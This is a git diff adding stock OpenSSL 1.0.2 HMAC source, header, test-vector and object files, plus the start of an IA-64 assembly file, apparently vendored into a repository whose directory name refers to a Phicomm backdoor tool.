zkS{xavGIKSH(aSuj!OKa5`RJBACvg^B#z&7;pYz$$Mah7n-c$o#Cu?0qF_9`;1T+L
z62D#I6B1V?eoEq>l=!m}zeD2Rm-we7{;I_B92fDtF7e$GU*#N+i4RG<ou3;xuO5lt
zFY!-H{7KHS!25_8_nf33l=#b%{)Z+0BNzS462DW@zb<ikUOV~uhVjemCGM}t<@hs_
z{#}y)Qxcc=+Z!(V6ekmQV`$=B7H5Ir;`~LQD1wV~|8q8OadA&5Ik>oQ%saSfHyoTd
zTlYILuDB<tTmfU}sbxgOBe?MYm_uL0bHc&J{pV>17xQ|_!9^Z^>EI%t|8Q^-|2;S%
z5D}-yGYOR!3P$<}l*XK0&WPGvHlGd|*?EJ6;5bN=(2;VPgyv?kf$HH9e8ia&BT$3R
z5PZ?#%Nxqf77E!Sm=<S^YzY1m>|vi`-kvU2LZ!LcQg+UOBZ2wI&cL@ZUC7#T{;zKp
z9N?6lH@ALZDChY8wOh8XsAGxWKKw28!z0UA@d6C;ZN3RU2z4As?C$_}g5b9Sxnme|
z#R*UugfEZXfcHJ{piigze`_BGTlBdX9$AF_M`Q?fF}^6HoH@rAe+gRm4DLter6~HL
zvRVFAesOJZMa&<rku!e}1H)K);gRJvbP95}U9{dJZc(P8N7P$NP`SbFWrlU9?&H9=
z!o!ytRcz_73zauTA>tQp6DsJ_X|HnogkwOb{b{h>EPq#d{(jE~!u;WX1Ys}s-)3W@
wNs0d;RGtR~*sYt`<3F1XYY*%!|7&y25x=7echb%6&-<YR<ePTUdOPj^1Kco`Q~&?~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.c
new file mode 100644
index 0000000..1fc9e2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.c
@@ -0,0 +1,253 @@
+/* crypto/hmac/hmac.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "cryptlib.h"
+#include <openssl/hmac.h>
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+int HMAC_Init_ex(HMAC_CTX *ctx, const void *key, int len,
+                 const EVP_MD *md, ENGINE *impl)
+{
+    int i, j, reset = 0;
+    unsigned char pad[HMAC_MAX_MD_CBLOCK];
+
+#ifdef OPENSSL_FIPS
+    /* If FIPS mode switch to approved implementation if possible */
+    if (FIPS_mode()) {
+        const EVP_MD *fipsmd;
+        if (md) {
+            fipsmd = FIPS_get_digestbynid(EVP_MD_type(md));
+            if (fipsmd)
+                md = fipsmd;
+        }
+    }
+
+    if (FIPS_mode()) {
+        /* If we have an ENGINE need to allow non FIPS */
+        if ((impl || ctx->i_ctx.engine)
+            && !(ctx->i_ctx.flags & EVP_CIPH_FLAG_NON_FIPS_ALLOW)) {
+            EVPerr(EVP_F_HMAC_INIT_EX, EVP_R_DISABLED_FOR_FIPS);
+            return 0;
+        }
+        /*
+         * Other algorithm blocking will be done in FIPS_cmac_init, via
+         * FIPS_hmac_init_ex().
+         */
+        if (!impl && !ctx->i_ctx.engine)
+            return FIPS_hmac_init_ex(ctx, key, len, md, NULL);
+    }
+#endif
+
+    if (md != NULL) {
+        reset = 1;
+        ctx->md = md;
+    } else
+        md = ctx->md;
+
+    if (key != NULL) {
+        reset = 1;
+        j = EVP_MD_block_size(md);
+        OPENSSL_assert(j <= (int)sizeof(ctx->key));
+        if (j < len) {
+            if (!EVP_DigestInit_ex(&ctx->md_ctx, md, impl))
+                goto err;
+            if (!EVP_DigestUpdate(&ctx->md_ctx, key, len))
+                goto err;
+            if (!EVP_DigestFinal_ex(&(ctx->md_ctx), ctx->key,
+                                    &ctx->key_length))
+                goto err;
+        } else {
+            OPENSSL_assert(len >= 0 && len <= (int)sizeof(ctx->key));
+            memcpy(ctx->key, key, len);
+            ctx->key_length = len;
+        }
+        if (ctx->key_length != HMAC_MAX_MD_CBLOCK)
+            memset(&ctx->key[ctx->key_length], 0,
+                   HMAC_MAX_MD_CBLOCK - ctx->key_length);
+    }
+
+    if (reset) {
+        for (i = 0; i < HMAC_MAX_MD_CBLOCK; i++)
+            pad[i] = 0x36 ^ ctx->key[i];
+        if (!EVP_DigestInit_ex(&ctx->i_ctx, md, impl))
+            goto err;
+        if (!EVP_DigestUpdate(&ctx->i_ctx, pad, EVP_MD_block_size(md)))
+            goto err;
+
+        for (i = 0; i < HMAC_MAX_MD_CBLOCK; i++)
+            pad[i] = 0x5c ^ ctx->key[i];
+        if (!EVP_DigestInit_ex(&ctx->o_ctx, md, impl))
+            goto err;
+        if (!EVP_DigestUpdate(&ctx->o_ctx, pad, EVP_MD_block_size(md)))
+            goto err;
+    }
+    if (!EVP_MD_CTX_copy_ex(&ctx->md_ctx, &ctx->i_ctx))
+        goto err;
+    return 1;
+ err:
+    return 0;
+}
+
+int HMAC_Init(HMAC_CTX *ctx, const void *key, int len, const EVP_MD *md)
+{
+    if (key && md)
+        HMAC_CTX_init(ctx);
+    return HMAC_Init_ex(ctx, key, len, md, NULL);
+}
+
+int HMAC_Update(HMAC_CTX *ctx, const unsigned char *data, size_t len)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->i_ctx.engine)
+        return FIPS_hmac_update(ctx, data, len);
+#endif
+    return EVP_DigestUpdate(&ctx->md_ctx, data, len);
+}
+
+int HMAC_Final(HMAC_CTX *ctx, unsigned char *md, unsigned int *len)
+{
+    unsigned int i;
+    unsigned char buf[EVP_MAX_MD_SIZE];
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->i_ctx.engine)
+        return FIPS_hmac_final(ctx, md, len);
+#endif
+
+    if (!EVP_DigestFinal_ex(&ctx->md_ctx, buf, &i))
+        goto err;
+    if (!EVP_MD_CTX_copy_ex(&ctx->md_ctx, &ctx->o_ctx))
+        goto err;
+    if (!EVP_DigestUpdate(&ctx->md_ctx, buf, i))
+        goto err;
+    if (!EVP_DigestFinal_ex(&ctx->md_ctx, md, len))
+        goto err;
+    return 1;
+ err:
+    return 0;
+}
+
+void HMAC_CTX_init(HMAC_CTX *ctx)
+{
+    EVP_MD_CTX_init(&ctx->i_ctx);
+    EVP_MD_CTX_init(&ctx->o_ctx);
+    EVP_MD_CTX_init(&ctx->md_ctx);
+}
+
+int HMAC_CTX_copy(HMAC_CTX *dctx, HMAC_CTX *sctx)
+{
+    if (!EVP_MD_CTX_copy(&dctx->i_ctx, &sctx->i_ctx))
+        goto err;
+    if (!EVP_MD_CTX_copy(&dctx->o_ctx, &sctx->o_ctx))
+        goto err;
+    if (!EVP_MD_CTX_copy(&dctx->md_ctx, &sctx->md_ctx))
+        goto err;
+    memcpy(dctx->key, sctx->key, HMAC_MAX_MD_CBLOCK);
+    dctx->key_length = sctx->key_length;
+    dctx->md = sctx->md;
+    return 1;
+ err:
+    return 0;
+}
+
+void HMAC_CTX_cleanup(HMAC_CTX *ctx)
+{
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !ctx->i_ctx.engine) {
+        FIPS_hmac_ctx_cleanup(ctx);
+        return;
+    }
+#endif
+    EVP_MD_CTX_cleanup(&ctx->i_ctx);
+    EVP_MD_CTX_cleanup(&ctx->o_ctx);
+    EVP_MD_CTX_cleanup(&ctx->md_ctx);
+    memset(ctx, 0, sizeof *ctx);
+}
+
+unsigned char *HMAC(const EVP_MD *evp_md, const void *key, int key_len,
+                    const unsigned char *d, size_t n, unsigned char *md,
+                    unsigned int *md_len)
+{
+    HMAC_CTX c;
+    static unsigned char m[EVP_MAX_MD_SIZE];
+
+    if (md == NULL)
+        md = m;
+    HMAC_CTX_init(&c);
+    if (!HMAC_Init(&c, key, key_len, evp_md))
+        goto err;
+    if (!HMAC_Update(&c, d, n))
+        goto err;
+    if (!HMAC_Final(&c, md, md_len))
+        goto err;
+    HMAC_CTX_cleanup(&c);
+    return md;
+ err:
+    return NULL;
+}
+
+void HMAC_CTX_set_flags(HMAC_CTX *ctx, unsigned long flags)
+{
+    EVP_MD_CTX_set_flags(&ctx->i_ctx, flags);
+    EVP_MD_CTX_set_flags(&ctx->o_ctx, flags);
+    EVP_MD_CTX_set_flags(&ctx->md_ctx, flags);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.h
new file mode 100644
index 0000000..b8b55cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.h
@@ -0,0 +1,109 @@
+/* crypto/hmac/hmac.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+#ifndef HEADER_HMAC_H
+# define HEADER_HMAC_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_HMAC
+#  error HMAC is disabled.
+# endif
+
+# include <openssl/evp.h>
+
+# define HMAC_MAX_MD_CBLOCK      128/* largest known is SHA512 */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct hmac_ctx_st {
+    const EVP_MD *md;
+    EVP_MD_CTX md_ctx;
+    EVP_MD_CTX i_ctx;
+    EVP_MD_CTX o_ctx;
+    unsigned int key_length;
+    unsigned char key[HMAC_MAX_MD_CBLOCK];
+} HMAC_CTX;
+
+# define HMAC_size(e)    (EVP_MD_size((e)->md))
+
+void HMAC_CTX_init(HMAC_CTX *ctx);
+void HMAC_CTX_cleanup(HMAC_CTX *ctx);
+
+/* deprecated */
+# define HMAC_cleanup(ctx) HMAC_CTX_cleanup(ctx)
+
+/* deprecated */
+int HMAC_Init(HMAC_CTX *ctx, const void *key, int len, const EVP_MD *md);
+int HMAC_Init_ex(HMAC_CTX *ctx, const void *key, int len,
+                 const EVP_MD *md, ENGINE *impl);
+int HMAC_Update(HMAC_CTX *ctx, const unsigned char *data, size_t len);
+int HMAC_Final(HMAC_CTX *ctx, unsigned char *md, unsigned int *len);
+unsigned char *HMAC(const EVP_MD *evp_md, const void *key, int key_len,
+                    const unsigned char *d, size_t n, unsigned char *md,
+                    unsigned int *md_len);
+int HMAC_CTX_copy(HMAC_CTX *dctx, HMAC_CTX *sctx);
+
+void HMAC_CTX_set_flags(HMAC_CTX *ctx, unsigned long flags);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmac.o
new file mode 100644
index 0000000000000000000000000000000000000000..d8e9a2933a7be4238f73841e7998bafd6b244249
GIT binary patch
literal 5416
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmactest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmactest.c
new file mode 100644
index 0000000..3d130a0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/hmactest.c
@@ -0,0 +1,167 @@
+/* crypto/hmac/hmactest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_HMAC
+int main(int argc, char *argv[])
+{
+    printf("No HMAC support\n");
+    return (0);
+}
+#else
+# include <openssl/hmac.h>
+# ifndef OPENSSL_NO_MD5
+#  include <openssl/md5.h>
+# endif
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+# ifndef OPENSSL_NO_MD5
+static struct test_st {
+    unsigned char key[16];
+    int key_len;
+    unsigned char data[64];
+    int data_len;
+    unsigned char *digest;
+} test[4] = {
+    {
+        "", 0, "More text test vectors to stuff up EBCDIC machines :-)", 54,
+        (unsigned char *)"e9139d1e6ee064ef8cf514fc7dc83e86",
+    },
+    {
+        {
+            0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b, 0x0b,
+            0x0b, 0x0b, 0x0b, 0x0b, 0x0b,
+        }, 16, "Hi There", 8,
+        (unsigned char *)"9294727a3638bb1c13f48ef8158bfc9d",
+    },
+    {
+        "Jefe", 4, "what do ya want for nothing?", 28,
+        (unsigned char *)"750c783e6ab0b503eaa86e310a5db738",
+    },
+    {
+        {
+            0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa,
+            0xaa, 0xaa, 0xaa, 0xaa, 0xaa,
+        }, 16, {
+            0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd,
+            0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd,
+            0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd,
+            0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd,
+            0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd
+        }, 50, (unsigned char *)"56be34521d144c88dbb8c733f0e8b3f6",
+    },
+};
+# endif
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+# ifndef OPENSSL_NO_MD5
+    int i;
+    char *p;
+# endif
+    int err = 0;
+
+# ifdef OPENSSL_NO_MD5
+    printf("test skipped: MD5 disabled\n");
+# else
+
+#  ifdef CHARSET_EBCDIC
+    ebcdic2ascii(test[0].data, test[0].data, test[0].data_len);
+    ebcdic2ascii(test[1].data, test[1].data, test[1].data_len);
+    ebcdic2ascii(test[2].key, test[2].key, test[2].key_len);
+    ebcdic2ascii(test[2].data, test[2].data, test[2].data_len);
+#  endif
+
+    for (i = 0; i < 4; i++) {
+        p = pt(HMAC(EVP_md5(),
+                    test[i].key, test[i].key_len,
+                    test[i].data, test[i].data_len, NULL, NULL));
+
+        if (strcmp(p, (char *)test[i].digest) != 0) {
+            printf("error calculating HMAC on %d entry'\n", i);
+            printf("got %s instead of %s\n", p, test[i].digest);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+    }
+# endif                         /* OPENSSL_NO_MD5 */
+    EXIT(err);
+    return (0);
+}
+
+# ifndef OPENSSL_NO_MD5
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < MD5_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ia64cpuid.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ia64cpuid.S
new file mode 100644
index 0000000..7832b9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ia64cpuid.S
@@ -0,0 +1,167 @@
+// Works on all IA-64 platforms: Linux, HP-UX, Win64i...
+// On Win64i compile with ias.exe.
+.text
+
+.global	OPENSSL_cpuid_setup#
+.proc	OPENSSL_cpuid_setup#
+OPENSSL_cpuid_setup:
+{ .mib;	br.ret.sptk.many	b0		};;
+.endp	OPENSSL_cpuid_setup#
+
+.global	OPENSSL_rdtsc#
+.proc	OPENSSL_rdtsc#
